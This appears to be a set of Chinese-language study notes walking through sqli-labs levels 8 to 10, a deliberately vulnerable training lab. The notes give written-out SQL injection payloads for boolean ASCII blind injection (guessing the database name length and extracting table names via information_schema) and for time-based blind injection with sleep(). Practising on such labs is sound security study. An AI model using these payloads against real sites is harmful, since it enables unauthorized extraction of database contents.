less-8
第一步判断闭合?id=1'
第二步判断字段数为3,第三步同理union select,但与上关类似无回显位置,可以用ASCII盲注,原理是通过推测每个字符ASCII值来获取库名
首先猜测库名长度 ?id=1' and (length(database()))=8,猜测库名长度为8
猜测数据库第一个字母ascii值为115,为s,8个字符以此类推
猜表名
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)))=101,返回正常则猜测正确,反复操作直至猜测失败,就能得到表名
后续操作语句与第一关类似,将其代入substr
less-9
按照盲注的方法,less9不管输入什么条件回显都是不变的,就不能证明盲注的方法了,尝试使用时间盲注 ?id=1' and if(length(database())=8,sleep(10),1),如果库名长度为8,则睡眠10秒,如图可见回车后处于加载状态,说明猜测正确,库名长度为8
时间盲注关键回显在于加载状态
猜测库名
if(length(database()),sleep(10),1)
猜测表名
后续类似第8关
less-10 做法与之前一样,只是闭合问题,?id=1"
